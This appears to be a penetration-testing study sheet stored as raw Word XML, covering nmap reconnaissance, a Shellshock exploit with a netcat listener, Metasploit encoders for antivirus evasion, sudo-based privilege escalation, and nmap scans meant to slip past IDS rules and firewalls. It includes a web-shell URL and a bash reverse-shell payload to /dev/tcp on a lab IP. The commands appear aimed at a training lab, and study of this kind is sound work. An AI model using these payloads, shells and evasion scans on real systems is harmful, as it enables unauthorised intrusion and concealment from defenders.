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2B9B6DE8" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:r w:rsidRPr="00094909">
        <w:t>+++++++++++++++++++++ACTIVE RECON+++++++++++++++++</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA">
        <w:t>++++++++++++++++++++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FCA0F3" w14:textId="5EC28C58" w:rsidR="00094909" w:rsidRPr="00B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NMAP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC1DB6" w14:textId="4EE884B3" w:rsidR="00B521CA" w:rsidRPr="00B521CA" w:rsidRDefault="00B521CA" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>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B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[+] Hosts Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D02761" w14:textId="3E15D845" w:rsidR="00094909" w:rsidRPr="00B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`````````````````````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA" w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>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Pr="00B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453B522" w14:textId="6C18556A" w:rsidR="00094909" w:rsidRPr="00B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>````````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA" w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>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B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>+ Targets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C2C58" w14:textId="6E43F267" w:rsidR="00094909" w:rsidRPr="00B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>```````````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA" w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>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U:53,T21-25,80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3B2CA6B2" w14:textId="77777777" w:rsidR="00B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:r w:rsidRPr="00094909">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00094909">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00094909">
        <w:t xml:space="preserve"> [ very verbose ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABC5BA3" w14:textId="3B03D182" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00094909">
        <w:lastRenderedPageBreak/>
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00094909">
        <w:t>:</w:t>
      </w:r>
    </w:p>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0C8277B8" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:r w:rsidRPr="00094909">
        <w:t>``````````````````````````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA">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68E8D52C" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:r w:rsidRPr="00094909">
        <w:t>``````````````````````````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA">
        <w:t>`````````````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4AFEE3" w14:textId="77777777" w:rsidR="00094909" w:rsidRPr="00B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E213A42" w14:textId="77777777" w:rsidR="00094909" w:rsidRPr="00B521CA" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>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-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD1AC88" w14:textId="77777777" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00094909">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00094909">
        <w:t>-protocols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3B213E9C" w:rsidR="00094909" w:rsidRPr="00094909" w:rsidRDefault="00094909" w:rsidP="00094909">
      <w:r w:rsidRPr="00094909">
        <w:t>`````````````````````````````````````````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA">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lastRenderedPageBreak/>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5E4E98B" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">
        <w:t>`````````````````````````````````````````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA">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42C715FC" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">
        <w:t>``````````````````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA">
        <w:t>`````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C03025" w14:textId="6AA34354" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">
        <w:t>vulnerability: SHELLSHOCK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7231C" w14:textId="145AE51B" w:rsidR="005E4ED1" w:rsidRPr="005E4ED1" w:rsidRDefault="005E4ED1" w:rsidP="005E4ED1">
      <w:r w:rsidRPr="005E4ED1">
        <w:t xml:space="preserve">Google:  2014 </w:t>
      </w:r>
    </w:p>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lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4ED1">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spell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lastRenderedPageBreak/>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listening  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spell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curl -A '() { :;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Pr="00B521CA" w:rsidRDefault="004F74D8" w:rsidP="004F74D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NESSUS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAD263C" w14:textId="1DC9EDE4" w:rsidR="004F74D8" w:rsidRPr="00B521CA" w:rsidRDefault="004F74D8" w:rsidP="004F74D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>```````</w:t>
      </w:r>
      <w:r w:rsidR="00B521CA" w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>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lastRenderedPageBreak/>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2. Main Components::Modules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Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CC68FD" w14:textId="3BEEED04" w:rsidR="00B4531B" w:rsidRDefault="00B4531B" w:rsidP="00B4531B">
      <w:r>
        <w:lastRenderedPageBreak/>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lastRenderedPageBreak/>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6F3253A9" w14:textId="3DF87615" w:rsidR="002C40CB" w:rsidRDefault="002C40CB" w:rsidP="002C40CB">
      <w:r>
        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32002D07" w14:textId="77777777" w:rsidR="00B36685" w:rsidRDefault="002C40CB" w:rsidP="002C40CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73902FED" w14:textId="0DA53159" w:rsidR="002C40CB" w:rsidRPr="00B521CA" w:rsidRDefault="002C40CB" w:rsidP="002C40CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````````````````````</w:t>
      </w:r>
      <w:r w:rsidR="00B36685" w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rP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lastRenderedPageBreak/>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Pr="00B521CA" w:rsidRDefault="002C40CB" w:rsidP="002C40CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C735D4" w14:textId="5CF0C29D" w:rsidR="002C40CB" w:rsidRDefault="002C40CB" w:rsidP="002C40CB">
      <w:r>
        <w:t xml:space="preserve"># Example output:# User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> may run the following commands on host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D68B991" w14:textId="77777777" w:rsidR="002C40CB" w:rsidRDefault="002C40CB" w:rsidP="002C40CB">
      <w:r>
        <w:t xml:space="preserve">#     </w:t>
      </w:r>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r w:rsidRPr="002C40CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C40CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD801D8" w14:textId="41F305AD" w:rsidR="000C41D8" w:rsidRDefault="000C41D8" w:rsidP="002C40CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645994C0" w14:textId="77777777" w:rsidR="00B521CA" w:rsidRDefault="00B521CA" w:rsidP="002C40CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021BCB03" w14:textId="77777777" w:rsidR="00B521CA" w:rsidRDefault="00B521CA" w:rsidP="002C40CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C566D7" w14:textId="77777777" w:rsidR="000C41D8" w:rsidRPr="000C41D8" w:rsidRDefault="000C41D8" w:rsidP="000C41D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C41D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>192.168.46.117/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell.php?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB5260" w14:textId="77777777" w:rsidR="000C41D8" w:rsidRPr="000C41D8" w:rsidRDefault="000C41D8" w:rsidP="000C41D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C41D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload: bash -c 'bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/192.168.47.167/9090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4574B632" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advanced NMAP Scans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E7016" w14:textId="5F256F79" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r>
        <w:t xml:space="preserve">We are going to bypass this rule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C41E1B" w14:textId="28D5A160" w:rsidR="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">alert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; $HOME_NET 21 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flags:SAR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733B7B6" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC3B28D" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XMAS Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A57C4D" w14:textId="2323E641" w:rsidR="00360BE5" w:rsidRPr="00B521CA" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B521CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>````````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9E6ED6" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">Sends a TCP packet with the FIN, PSH, and URG flags set. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EF1EB" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="306386AF" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CAE8CB" w14:textId="2AA82D26"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sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 20-25 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31516E6B" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="1C05BAF7" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source Port Manipulation (-g):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E26322" w14:textId="134EDCCF" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````````````````````````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201DB2D" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>To use a common source port (like port 53 for DNS or port 80 for HTTP) to bypass stateless firewalls that trust traffic originating from these ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4246A7" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="55097BCA" w14:textId="7F47D7A0" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:lastRenderedPageBreak/>
        <w:t>Some simple firewalls are configured to allow any traffic coming from a specific port, assuming it's part of a legitimate, established connection (e.g., a DNS reply). The -g (or --source-port) flag in Nmap lets you specify the source port for your scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DED470" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A88C7A4" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRP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-g 53 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5FE18E" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="73F96DDB" w14:textId="02281569" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">Wireshark Analysis: Run a Wireshark capture on your Kali interface (eth0 or similar) during the second scan. Apply the filter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>tcp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"> == 53. You should see that your scan packets are originating from port 53 on your machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F86D02" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NULL Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7AC8B5" w14:textId="7AC6D1CB" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>```````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C607962" w14:textId="56CA0023" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>Sends a TCP packet with no flags set. RFC 793 standard states that if a port is closed, it should respond with an RST packet. If it's open, it should ignore the packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D7A2C" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE203F" w14:textId="1E7411E4" w:rsid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-p 20-25 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A065265" w14:textId="77777777" w:rsidR="00B521CA" w:rsidRPr="00360BE5" w:rsidRDefault="00B521CA" w:rsidP="00360BE5"/>
    <w:p w14:paraId="07180BEC" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decoy Scanning (-D):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408E19F3" w14:textId="586FDF19" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`````````````````````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D62EB10" w14:textId="1F93C0C3" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>To make it difficult for the target's intrusion detection system (IDS) to determine the true source IP address of a scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42A2C2" w14:textId="0256CB0A" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>The -D (or --decoy) flag allows you to specify one or more IP addresses to be used as "decoys." Nmap will send packets from these decoy IPs as well as your own. To the target, the scan appears to be coming from multiple sources simultaneously. Your real IP is randomly placed among the decoys by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A98D5" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>example:</w:t>
